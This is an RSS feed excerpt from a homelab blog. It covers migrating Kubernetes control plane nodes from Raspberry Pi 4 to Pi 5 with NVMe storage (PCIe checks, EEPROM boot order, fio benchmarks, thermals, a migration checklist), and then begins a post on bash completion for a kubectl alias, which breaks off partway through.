</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span>d0<span style="color:#f92672">]</span> MSI-X: Enable+ Count<span style="color:#f92672">=</span><span style="color:#ae81ff">9</span> Masked-
</span></span><span style="display:flex;"><span>		Vector table: BAR<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> offset<span style="color:#f92672">=</span><span style="color:#ae81ff">00002000</span>
</span></span><span style="display:flex;"><span>		PBA: BAR<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> offset<span style="color:#f92672">=</span><span style="color:#ae81ff">00003000</span>
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span>e0<span style="color:#f92672">]</span> MSI: Enable- Count<span style="color:#f92672">=</span>1/8 Maskable- 64bit+
</span></span><span style="display:flex;"><span>		Address: <span style="color:#ae81ff">0000000000000000</span>  Data: <span style="color:#ae81ff">0000</span>
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span>f8<span style="color:#f92672">]</span> Power Management version <span style="color:#ae81ff">3</span>
</span></span><span style="display:flex;"><span>		Flags: PMEClk- DSI- D1- D2- AuxCurrent<span style="color:#f92672">=</span>0mA PME<span style="color:#f92672">(</span>D0-,D1-,D2-,D3hot-,D3cold-<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>		Status: D0 NoSoftRst+ PME-Enable- DSel<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> DScale<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> PME-
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span><span style="color:#ae81ff">100</span> v1<span style="color:#f92672">]</span> Latency Tolerance Reporting
</span></span><span style="display:flex;"><span>		Max snoop latency: 0ns
</span></span><span style="display:flex;"><span>		Max no snoop latency: 0ns
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span><span style="color:#ae81ff">110</span> v1<span style="color:#f92672">]</span> L1 PM Substates
</span></span><span style="display:flex;"><span>		L1SubCap: PCI-PM_L1.2+ PCI-PM_L1.1+ ASPM_L1.2+ ASPM_L1.1+ L1_PM_Substates+
</span></span><span style="display:flex;"><span>			  PortCommonModeRestoreTime<span style="color:#f92672">=</span>10us PortTPowerOnTime<span style="color:#f92672">=</span>60us
</span></span><span style="display:flex;"><span>		L1SubCtl1: PCI-PM_L1.2- PCI-PM_L1.1- ASPM_L1.2- ASPM_L1.1-
</span></span><span style="display:flex;"><span>			   T_CommonMode<span style="color:#f92672">=</span>0us LTR1.2_Threshold<span style="color:#f92672">=</span>76800ns
</span></span><span style="display:flex;"><span>		L1SubCtl2: T_PwrOn<span style="color:#f92672">=</span>60us
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span><span style="color:#ae81ff">128</span> v1<span style="color:#f92672">]</span> Alternative Routing-ID Interpretation <span style="color:#f92672">(</span>ARI<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>		ARICap:	MFVC- ACS-, Next Function: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>		ARICtl:	MFVC- ACS-, Function Group: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span><span style="color:#ae81ff">200</span> v2<span style="color:#f92672">]</span> Advanced Error Reporting
</span></span><span style="display:flex;"><span>		UESta:	DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol-
</span></span><span style="display:flex;"><span>		UEMsk:	DLP- SDES- TLP- FCP- CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP- ECRC- UnsupReq- ACSViol-
</span></span><span style="display:flex;"><span>		UESvrt:	DLP+ SDES- TLP- FCP+ CmpltTO- CmpltAbrt- UnxCmplt- RxOF- MalfTLP+ ECRC- UnsupReq- ACSViol-
</span></span><span style="display:flex;"><span>		CESta:	RxErr- BadTLP- BadDLLP- Rollover- Timeout- AdvNonFatalErr-
</span></span><span style="display:flex;"><span>		CEMsk:	RxErr- BadTLP- BadDLLP- Rollover- Timeout- AdvNonFatalErr+
</span></span><span style="display:flex;"><span>		AERCap:	First Error Pointer: 00, ECRCGenCap- ECRCGenEn- ECRCChkCap+ ECRCChkEn-
</span></span><span style="display:flex;"><span>			MultHdrRecCap- MultHdrRecEn- TLPPfxPres- HdrLogCap-
</span></span><span style="display:flex;"><span>		HeaderLog: <span style="color:#ae81ff">00000001</span> 0000070f 0000001c 185194a3
</span></span><span style="display:flex;"><span>	Capabilities: <span style="color:#f92672">[</span><span style="color:#ae81ff">300</span> v1<span style="color:#f92672">]</span> Secondary PCI Express
</span></span><span style="display:flex;"><span>		LnkCtl3: LnkEquIntrruptEn- PerformEqu-
</span></span><span style="display:flex;"><span>		LaneErrStat: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>	Kernel driver in use: nvme
</span></span><span style="display:flex;"><span>	Kernel modules: nvme
</span></span></code></pre></div><p>Okay, that&rsquo;s a lot. But it did show the expected value for the NVMe SSD, in particular
this line:</p>
<pre tabindex="0"><code>LnkSta:	Speed 8GT/s, Width x1 (downgraded)
</code></pre><p>So yay, PCIe Gen3 was working. And I got that same result on all four Pis. I
know I&rsquo;m repeating myself, but at that point I was so happy that I wouldn&rsquo;t need
to reseat that PCIe cable.</p>
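<p>For a quick check on each Pi, the link status line can also be grepped out directly
instead of wading through the full dump; the device address below is a placeholder for
whatever <code>lspci</code> lists for the SSD:</p>
<pre tabindex="0"><code># print only the PCIe link status of the NVMe SSD
sudo lspci -vv -s 01:00.0 | grep -i lnksta
</code></pre>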
<p>Next step was to have a look at the boot order. I thought I would need to
explicitly add the NVMe disk, but it turns out that the factory firmware already
had it in the boot order. I still went in and changed it, because by default the
NVMe was tried before USB boot. And I like it to be the other way around, so
that I can attach a USB stick if I ever bork the NVMe install
and have it boot off of that first.</p>
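<p>For reference, <code>BOOT_ORDER</code> is read right to left, one hex digit per boot
mode; if I read the bootloader documentation correctly, 1 is the SD card, 4 is USB mass
storage, 6 is NVMe and f means start over. The value I ended up with (visible in the
EEPROM config below) therefore reads like this:</p>
<pre tabindex="0"><code># right to left: SD card, then USB, then NVMe, then restart the whole loop
BOOT_ORDER=0xf641
</code></pre>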
<p>The bootloader on the Pi sits in an EEPROM chip on the board, and it can be changed
with the <code>rpi-eeprom-config --edit</code> command. It looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>root@ubuntu:~# rpi-eeprom-config --edit
</span></span><span style="display:flex;"><span>Updating bootloader EEPROM
</span></span><span style="display:flex;"><span> image: /lib/firmware/raspberrypi/bootloader-2712/default/pieeprom-2023-12-06.bin
</span></span><span style="display:flex;"><span>config_src: blconfig device
</span></span><span style="display:flex;"><span>config: /tmp/tmplbyfxh81/boot.conf
</span></span><span style="display:flex;"><span><span style="color:#75715e">################################################################################</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>all<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>BOOT_UART<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>POWER_OFF_ON_HALT<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>BOOT_ORDER<span style="color:#f92672">=</span>0xf641
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">################################################################################</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>*** To cancel this update run <span style="color:#e6db74">&#39;sudo rpi-eeprom-update -r&#39;</span> ***
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>*** CREATED UPDATE /tmp/tmplbyfxh81/pieeprom.upd  ***
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>   WARNING: Installing an older bootloader version.
</span></span><span style="display:flex;"><span>            Update the rpi-eeprom package to fetch the latest bootloader images.
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>   CURRENT: Mon Sep <span style="color:#ae81ff">23</span> 13:02:56 UTC <span style="color:#ae81ff">2024</span> <span style="color:#f92672">(</span>1727096576<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>    UPDATE: Wed Dec  <span style="color:#ae81ff">6</span> 18:29:25 UTC <span style="color:#ae81ff">2023</span> <span style="color:#f92672">(</span>1701887365<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>    BOOTFS: /boot/firmware
</span></span><span style="display:flex;"><span><span style="color:#e6db74">&#39;/tmp/tmp.joXPbvsUuq&#39;</span> -&gt; <span style="color:#e6db74">&#39;/boot/firmware/pieeprom.upd&#39;</span>
</span></span><span style="display:flex;"><span>Copying recovery.bin to /boot/firmware <span style="color:#66d9ef">for</span> EEPROM update
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>EEPROM updates pending. Please reboot to apply the update.
</span></span><span style="display:flex;"><span>To cancel a pending update run <span style="color:#e6db74">&#34;sudo rpi-eeprom-update -r&#34;</span>.
</span></span></code></pre></div><p>The problem I ran into here was this line:</p>
<pre tabindex="0"><code>WARNING: Installing an older bootloader version.
         Update the rpi-eeprom package to fetch the latest bootloader images.

CURRENT: Mon Sep 23 13:02:56 UTC 2024 (1727096576)
 UPDATE: Wed Dec  6 18:29:25 UTC 2023 (1701887365)
</code></pre><p>The bootloader image shipped with Ubuntu, even the new Ubuntu 24.04 I was
running, was older than what was already on the EEPROM. And there was nothing newer available for the LTS release either. So I
installed <a href="https://launchpad.net/~waveform/+archive/ubuntu/eeprom">this PPA</a>.
After that, I got the same version in the EEPROM update as the factory firmware.</p>
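<p>For anyone wanting to reproduce this, getting the newer images boils down to a few
commands; note that the PPA name is inferred from the Launchpad URL above, so
double-check it before adding it:</p>
<pre tabindex="0"><code>sudo add-apt-repository ppa:waveform/eeprom
sudo apt update
sudo apt install rpi-eeprom
# then re-run the edit, which now offers the newer bootloader image
sudo rpi-eeprom-config --edit
</code></pre>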
<h3 id="testing-the-pi-5">Testing the Pi 5</h3>
<p>Next up were a couple of performance tests. I was particularly interested in the
IOPS of the NVMe Pi 5 versus the Pi 4 with a USB-attached SATA SSD, because I
think that the stability issues were mostly due to IO, not CPU performance.</p>
<p>I used <a href="https://github.com/axboe/fio">fio</a> to test the performance on the Pi 5
and Pi 4. On both, I used the following invocation:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>fio --size<span style="color:#f92672">=</span>20M --rw<span style="color:#f92672">=</span>randrw --name<span style="color:#f92672">=</span>IOPS --bs<span style="color:#f92672">=</span>4k --direct<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> --filename<span style="color:#f92672">=</span>/tmp/disk/testfile --numjobs<span style="color:#f92672">=</span><span style="color:#ae81ff">4</span> --ioengine<span style="color:#f92672">=</span>libaio --iodepth<span style="color:#f92672">=</span><span style="color:#ae81ff">32</span> --refill_buffers --group_reporting --runtime<span style="color:#f92672">=</span><span style="color:#ae81ff">60</span> --time_based
</span></span></code></pre></div><p>So I did random read/write, with a block size of 4k, using direct IO, meaning
ignoring all FS caches, running for 60 seconds using the libaio engine. I also
ran four processes in parallel, as I figured that there would be more than one
writer with the machines serving as control plane nodes.</p>
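<p>Most of the control plane&rsquo;s disk traffic comes from etcd, which cares more about
fsync latency than about raw IOPS. That&rsquo;s not what the run above measures, so purely
as a sketch, an fio invocation mimicking etcd&rsquo;s small, fdatasync-heavy writes would
look something like this:</p>
<pre tabindex="0"><code># sequential small writes with an fdatasync after every write
fio --name=etcd-sync --rw=write --ioengine=sync --fdatasync=1 --bs=2300 --size=22m --filename=/tmp/disk/etcd-testfile
</code></pre>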
<p>The full results for the Pi 5 look like this:</p>
<pre tabindex="0"><code>IOPS: (groupid=0, jobs=4): err= 0: pid=5241: Mon Apr 21 14:24:29 2025
  read: IOPS=151k, BW=589MiB/s (618MB/s)(34.5GiB/60001msec)
    slat (usec): min=2, max=3070, avg= 5.50, stdev= 6.14
    clat (usec): min=53, max=5266, avg=503.04, stdev=121.10
     lat (usec): min=58, max=5269, avg=508.54, stdev=121.22
    clat percentiles (usec):
     |  1.00th=[  302],  5.00th=[  347], 10.00th=[  371], 20.00th=[  408],
     | 30.00th=[  433], 40.00th=[  461], 50.00th=[  490], 60.00th=[  519],
     | 70.00th=[  553], 80.00th=[  594], 90.00th=[  652], 95.00th=[  701],
     | 99.00th=[  816], 99.50th=[  881], 99.90th=[ 1139], 99.95th=[ 1582],
     | 99.99th=[ 2999]
   bw (  KiB/s): min=582384, max=624383, per=100.00%, avg=604312.95, stdev=1736.39, samples=476
   iops        : min=145596, max=156095, avg=151077.84, stdev=434.11, samples=476
  write: IOPS=151k, BW=589MiB/s (618MB/s)(34.5GiB/60001msec); 0 zone resets
    slat (usec): min=3, max=3058, avg= 6.69, stdev= 7.72
    clat (usec): min=21, max=5212, avg=330.48, stdev=86.79
     lat (usec): min=28, max=5216, avg=337.17, stdev=87.20
    clat percentiles (usec):
     |  1.00th=[  208],  5.00th=[  245], 10.00th=[  262], 20.00th=[  281],
     | 30.00th=[  293], 40.00th=[  306], 50.00th=[  318], 60.00th=[  330],
     | 70.00th=[  343], 80.00th=[  367], 90.00th=[  420], 95.00th=[  474],
     | 99.00th=[  594], 99.50th=[  660], 99.90th=[  906], 99.95th=[ 1156],
     | 99.99th=[ 2933]
   bw (  KiB/s): min=584860, max=622736, per=100.00%, avg=603963.50, stdev=1777.65, samples=476
   iops        : min=146215, max=155684, avg=150990.54, stdev=444.42, samples=476
  lat (usec)   : 50=0.01%, 100=0.02%, 250=3.28%, 500=71.81%, 750=23.57%
  lat (usec)   : 1000=1.19%
  lat (msec)   : 2=0.10%, 4=0.03%, 10=0.01%
  cpu          : usr=17.90%, sys=49.51%, ctx=9396343, majf=0, minf=62
  IO depths    : 1=0.1%, 2=0.1%, 4=0.1%, 8=0.1%, 16=0.1%, 32=100.0%, &gt;=64=0.0%
     submit    : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.0%, 64=0.0%, &gt;=64=0.0%
     complete  : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.1%, 64=0.0%, &gt;=64=0.0%
     issued rwts: total=9052812,9047408,0,0 short=0,0,0,0 dropped=0,0,0,0
     latency   : target=0, window=0, percentile=100.00%, depth=32

Run status group 0 (all jobs):
   READ: bw=589MiB/s (618MB/s), 589MiB/s-589MiB/s (618MB/s-618MB/s), io=34.5GiB (37.1GB), run=60001-60001msec
  WRITE: bw=589MiB/s (618MB/s), 589MiB/s-589MiB/s (618MB/s-618MB/s), io=34.5GiB (37.1GB), run=60001-60001msec

Disk stats (read/write):
  nvme0n1: ios=9025140/9020061, sectors=72201120/72160584, merge=0/12, ticks=4333666/2703156, in_queue=7036831, util=100.00%
</code></pre><p>The bandwidth was 618 MB/s read and write:</p>
<pre tabindex="0"><code> READ: bw=589MiB/s (618MB/s), 589MiB/s-589MiB/s (618MB/s-618MB/s), io=34.5GiB (37.1GB), run=60001-60001msec
WRITE: bw=589MiB/s (618MB/s), 589MiB/s-589MiB/s (618MB/s-618MB/s), io=34.5GiB (37.1GB), run=60001-60001msec
</code></pre><p>This is a respectable result, considering that the max for PCIe Gen3 x1 is around
1 GB/s.
But more important for me are the IOPS. While the kube control plane is writing
at about 5-6 MB/s, even the USB-attached SATA SSDs shouldn&rsquo;t have had a problem
with that. And the IOPS were looking quite good:</p>
<pre tabindex="0"><code>read: IOPS=151k, BW=589MiB/s (618MB/s)(34.5GiB/60001msec)
 iops        : min=145596, max=156095, avg=151077.84, stdev=434.11, samples=476
write: IOPS=151k, BW=589MiB/s (618MB/s)(34.5GiB/60001msec); 0 zone resets
 iops        : min=146215, max=155684, avg=150990.54, stdev=444.42, samples=476
</code></pre><p>Both read and write reach over 145k IOPS. So let&rsquo;s look at the Pi 4 and its USB-attached
SATA SSD next:</p>
<pre tabindex="0"><code>IOPS: (groupid=0, jobs=4): err= 0: pid=27703: Mon Apr 21 16:33:26 2025
  read: IOPS=9989, BW=39.0MiB/s (40.9MB/s)(2341MiB/60002msec)
    slat (usec): min=14, max=63796, avg=182.32, stdev=1012.51
    clat (usec): min=229, max=160456, avg=5308.50, stdev=8919.53
     lat (usec): min=278, max=160518, avg=5490.82, stdev=9174.55
    clat percentiles (usec):
     |  1.00th=[  1123],  5.00th=[  1598], 10.00th=[  1958], 20.00th=[  2409],
     | 30.00th=[  2704], 40.00th=[  3032], 50.00th=[  3425], 60.00th=[  3884],
     | 70.00th=[  4490], 80.00th=[  5342], 90.00th=[  6915], 95.00th=[  9110],
     | 99.00th=[ 55837], 99.50th=[ 66323], 99.90th=[ 88605], 99.95th=[ 99091],
     | 99.99th=[116917]
   bw (  KiB/s): min= 3542, max=63975, per=99.82%, avg=39884.73, stdev=5709.77, samples=476
   iops        : min=  885, max=15993, avg=9970.55, stdev=1427.44, samples=476
  write: IOPS=10.0k, BW=39.1MiB/s (41.0MB/s)(2346MiB/60002msec); 0 zone resets
    slat (usec): min=15, max=53787, avg=187.38, stdev=1055.71
    clat (usec): min=703, max=184799, avg=7109.60, stdev=10493.22
     lat (usec): min=929, max=184878, avg=7296.98, stdev=10765.19
    clat percentiles (msec):
     |  1.00th=[    3],  5.00th=[    3], 10.00th=[    3], 20.00th=[    4],
     | 30.00th=[    5], 40.00th=[    5], 50.00th=[    5], 60.00th=[    6],
     | 70.00th=[    7], 80.00th=[    8], 90.00th=[    9], 95.00th=[   12],
     | 99.00th=[   65], 99.50th=[   81], 99.90th=[  108], 99.95th=[  117],
     | 99.99th=[  146]
   bw (  KiB/s): min= 3728, max=64184, per=99.79%, avg=39957.87, stdev=5722.84, samples=476
   iops        : min=  932, max=16046, avg=9988.86, stdev=1430.70, samples=476
  lat (usec)   : 250=0.01%, 500=0.01%, 750=0.03%, 1000=0.22%
  lat (msec)   : 2=5.41%, 4=40.14%, 10=48.37%, 20=2.36%, 50=1.65%
  lat (msec)   : 100=1.72%, 250=0.10%
  cpu          : usr=4.22%, sys=39.42%, ctx=342409, majf=0, minf=108
  IO depths    : 1=0.1%, 2=0.1%, 4=0.1%, 8=0.1%, 16=0.1%, 32=100.0%, &gt;=64=0.0%
     submit    : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.0%, 64=0.0%, &gt;=64=0.0%
     complete  : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.1%, 64=0.0%, &gt;=64=0.0%
     issued rwts: total=599380,600626,0,0 short=0,0,0,0 dropped=0,0,0,0
     latency   : target=0, window=0, percentile=100.00%, depth=32

Run status group 0 (all jobs):
   READ: bw=39.0MiB/s (40.9MB/s), 39.0MiB/s-39.0MiB/s (40.9MB/s-40.9MB/s), io=2341MiB (2455MB), run=60002-60002msec
  WRITE: bw=39.1MiB/s (41.0MB/s), 39.1MiB/s-39.1MiB/s (41.0MB/s-41.0MB/s), io=2346MiB (2460MB), run=60002-60002msec

Disk stats (read/write):
  sda: ios=592523/587906, sectors=4786048/4795680, merge=5733/11554, ticks=1431760/1951190, in_queue=3383201, util=70.66%
</code></pre><p>Well, yeah. The bandwidth doesn&rsquo;t get beyond 41 MB/s in read or write:</p>
<pre tabindex="0"><code> READ: bw=39.0MiB/s (40.9MB/s), 39.0MiB/s-39.0MiB/s (40.9MB/s-40.9MB/s), io=2341MiB (2455MB), run=60002-60002msec
WRITE: bw=39.1MiB/s (41.0MB/s), 39.1MiB/s-39.1MiB/s (41.0MB/s-41.0MB/s), io=2346MiB (2460MB), run=60002-60002msec
</code></pre><p>And the IOPS aren&rsquo;t looking any better:</p>
<pre tabindex="0"><code>  read: IOPS=9989, BW=39.0MiB/s (40.9MB/s)(2341MiB/60002msec)
   iops        : min=  885, max=15993, avg=9970.55, stdev=1427.44, samples=476
  write: IOPS=10.0k, BW=39.1MiB/s (41.0MB/s)(2346MiB/60002msec); 0 zone resets
   iops        : min=  932, max=16046, avg=9988.86, stdev=1430.70, samples=476
</code></pre><p>Again, yeah. Especially the <code>min</code> values are looking really bad - not even 1k IOPS?
And the averages just below 10k aren&rsquo;t exactly awe-inspiring. So the Pi 5 with
NVMe disks gave me an entire order of magnitude more IO - both for bandwidth and
for IOPS.</p>
<p>Next up, some temperature testing. I was worried in this area, because most Pi 5
cases seem to have an active cooler. But I really wanted the passive heat sink
to work. First, I observed that at idle, the Pi 5 already reached about 50 C.
Not a great sign. To put a bit of load on the machine, I started running
<code>stress -c4 -t 600</code> and watched the temps with <code>watch -n 5 cat /sys/class/thermal/thermal_zone0/temp</code>.
I also kept an eye on the CPU frequency to make sure the Pi didn&rsquo;t downclock
with <code>watch -n 5 cat /sys/devices/system/cpu/cpu*/cpufreq/scaling_cur_freq</code>.
The good news is that no downclocking happened. But at the end of those
10 minutes, the temps had reached a toasty 78 C, and they didn&rsquo;t look like they
had stabilized yet; had I left the test running longer, they would likely have
climbed further.</p>
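<p>The raw sysfs value is in millidegrees, by the way, so a small convenience is to fold
both watches into one and do the division on the fly; a sketch:</p>
<pre tabindex="0"><code>watch -n 5 &#39;echo &#34;$(($(cat /sys/class/thermal/thermal_zone0/temp) / 1000)) C&#34;; cat /sys/devices/system/cpu/cpu*/cpufreq/scaling_cur_freq&#39;
</code></pre>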
<p>Looking at the temps on my deployed Pis, I didn&rsquo;t need to worry: The temps of
all three, running the k8s control plane, are around 52 - 55 C.
One more thing to note is the NVMe temp. There&rsquo;s zero airflow over it. I don&rsquo;t
gather the NVMe temps in my metrics, but I did a couple of spot checks, and the
temps were around 65 C. Well within the SSD&rsquo;s spec, but also something I need
to keep a closer eye on in the future. If push comes to shove, I can mount a
couple of large Noctua fans behind the Pis, and that should be enough, even at
low RPMs.</p>
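<p>For similar spot checks, the drive reports its own temperature via SMART. Assuming
the nvme-cli or smartmontools package is installed and the SSD shows up as
<code>/dev/nvme0</code>, either of these works:</p>
<pre tabindex="0"><code>sudo nvme smart-log /dev/nvme0 | grep -i temperature
sudo smartctl -a /dev/nvme0 | grep -i temperature
</code></pre>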
<p>This concluded the testing, and the last thing remaining was to verify that
my Ansible playbooks worked against a Pi 5 without changes. And they did. Both
my image creation with HashiCorp&rsquo;s <a href="https://developer.hashicorp.com/packer">Packer</a>
and my main deployment playbook worked without any change, and booting the test
Pi off of the NVMe worked out of the box. The only change I had to make was to
add the PCIe Gen3 config to the Raspberry Pi play. It&rsquo;s very nice to see how
few changes I needed.</p>
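<p>For reference, that &ldquo;PCIe Gen3 config&rdquo; boils down to a single line in the Pi&rsquo;s
config.txt, which the play just has to make sure is present. Done by hand, and assuming
Ubuntu&rsquo;s <code>/boot/firmware/config.txt</code> location, it would be:</p>
<pre tabindex="0"><code># enable PCIe Gen3 on the Pi 5; takes effect after a reboot
echo &#39;dtparam=pciex1_gen=3&#39; | sudo tee -a /boot/firmware/config.txt
</code></pre>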
<h2 id="deploying-the-pis">Deploying the Pis</h2>
<p>For the deployment of the Pis, I&rsquo;d set myself a somewhat complicated goal: I
wanted to keep using the host names of my current control plane hosts. Which made
the initial install more bothersome. But I decided against taking down the
original nodes first, because I didn&rsquo;t want to leave the cluster with only two
CP nodes during the new host&rsquo;s install, especially considering the instability that already existed.</p>
<p>So I had roughly the following steps:</p>
<ol>
<li>Boot new Pi from USB</li>
<li>Adapt boot order to put NVMe behind USB</li>
<li>Add a temporary entry with a temporary name in static DHCP</li>
<li>Generate image, but again with temporary hostname</li>
<li>Install image onto the NVMe SSD and reboot</li>
<li>Run full Ubuntu update, set root PW</li>
<li>Run full deployment Ansible playbook</li>
<li>Drain the old control plane node</li>
<li>Remove the old CP node from the Kubernetes cluster with <code>kubeadm reset</code>
and <code>kubectl delete node foo</code> (see the command sketch after the list)</li>
<li>Shutdown both nodes</li>
<li>Deploy new HW and remove old Pi 4</li>
<li>Update DHCP entry of old CP node with new Pi 5 MAC and remove temporary entry</li>
<li>Boot new node</li>
<li>Go into Ansible, set node name for new node and re-run deployment playbook, which also sets the hostname</li>
<li>Reboot new node</li>
<li>Add new node to k8s cluster as control plane</li>
</ol>
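<p>For reference, the kubectl/kubeadm side of steps 8 and 9 is roughly the following,
with <code>foo</code> as the placeholder node name and <code>kubeadm reset</code> running on
the old node itself:</p>
<pre tabindex="0"><code># step 8: drain the old control plane node
kubectl drain foo --ignore-daemonsets --delete-emptydir-data
# step 9, on the old node itself: wipe its Kubernetes state
sudo kubeadm reset
# step 9, from a working kubectl: remove the node object from the cluster
kubectl delete node foo
</code></pre>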
<p>In contrast to previous attempts of mine to switch control plane hosts, this one
went off without a hitch.</p>
<p>And since that moment, I have not had any spurious restarts of any control plane
Pods. Not a single one. So problem solved. By throwing better hardware
at it. &#x1f601;</p>
<p>But before I end this post, here are two more plots. This one shows the CPU utilization
of one of the Pi 4 control plane nodes during a random day:
<figure>
    <img loading="lazy" src="pi4-cpu.png"
         alt="A screenshot of a Grafana time series plot. It shows 24h worth of CPU utilization. The utilization is very stable, with the host at about 25% utilization, save for a couple of IOWAIT spikes up to 40%."/> <figcaption>
            <p>CPU utilization of a Pi 4 control plane node.</p>
        </figcaption>
</figure>

And here is a 24h plot of the same node, only now running on a Pi 5:
<figure>
    <img loading="lazy" src="pi5-cpu.png"
         alt="A screenshot of a Grafana time series plot. It shows 24h worth of CPU utilization. As in the previous screenshot, the utilization is pretty stable overall at about 12%. The previous IOWAIT spikes are gone now, and there are only two spikes to about 20% utilization."/> <figcaption>
            <p>CPU utilization of a Pi 5 control plane node.</p>
        </figcaption>
</figure>
</p>
<p>These plots show the effect of the Pi 5&rsquo;s more powerful CPU. They also indicate that the IOPS
issue is gone, as the Pi 5 plot doesn&rsquo;t have any IOWAIT spikes anymore.</p>
<p>I would have also loved to show a power consumption plot, but honestly, I don&rsquo;t
see any changes after switching to the Pi 5.</p>
<h2 id="conclusion">Conclusion</h2>
<p>This was a pretty nice project. It accomplished exactly what I had hoped, and
I didn&rsquo;t have any issues at all. Besides those PCIe cables. They almost drove my
entire Homelab into the arms of Hetzner.</p>
<p>Next up will be a post about migrating my Prometheus metrics storage to Thanos.</p>
<p>Re-reading the post and editing a bit, I should perhaps make the next project
a switch of my blog&rsquo;s theme. Those Grafana screenshots really are not very
readable. I need a theme which allows clicking on a figure and enlarging it.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Sammelsurium I</title>
      <link>https://blog.mei-home.net/posts/sammelsurium-1/</link>
      <pubDate>Thu, 01 May 2025 23:50:19 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/sammelsurium-1/</guid>
      <description>A random mix of topics too small for their own posts but not ephemeral enough for a Fediverse post</description>
      <content:encoded><![CDATA[<p>Wherein I write down things that don&rsquo;t feel like they should be their own post.</p>
<p>My blogging notes are starting to really fill up with small topics I&rsquo;d like to
write about, but which don&rsquo;t feel like they warrant their own post. On the other
hand, they also don&rsquo;t feel ephemeral enough to just be a Fediverse post. So I
decided to introduce the Sammelsurium, which is the German word for a random
collection of things.</p>
<h2 id="setting-up-autocomplete-for-a-shell-alias">Setting up autocomplete for a shell alias</h2>
<p>Way back when I started my k8s experiments, I made the reasonable decision to
set up <code>k</code> as a bash alias for <code>kubectl</code>. Over the last 16 or so months that
must have saved me quite a lot of typing. The alias is as simple as they come:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>alias k<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;kubectl&#34;</span>
</span></span></code></pre></div><p>There&rsquo;s also a pretty extensive autocomplete. I&rsquo;ve deployed it into my bashrc
by first writing it out into a file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>kubectl completion bash &gt; ~/.kube/kubectl-comp
</span></span></code></pre></div><p>Then I source that file in my bashrc:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>source ~/.kube/kubectl-comp
</span></span></code></pre></div><p>So far, so nice. But the problem is now: This only works for <code>kubectl</code>, not for
my <code>k</code> alias!</p>
<p>To make it work for my alias as well, I had to add these lines to my bashrc:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> <span style="color:#66d9ef">$(</span>type -t compopt<span style="color:#66d9ef">)</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;builtin&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    complete -o default -F __start_kubectl k
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>    complete -o default -o nospace -F __start_kubectl k
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span></code></pre></div><p>Perhaps similarly useful, I&rsquo;ve also set up an alias for the <a href="https://github.com/rook/kubectl-rook-ceph">Rook Ceph</a>
kubectl plugin. This plugin needs to be told the cluster and operator namespaces.
As I&rsquo;ve only got one Rook Ceph cluster in my setup, those values never change,
so it doesn&rsquo;t make any sense to type them again and again. My alias looks like
this:</p>
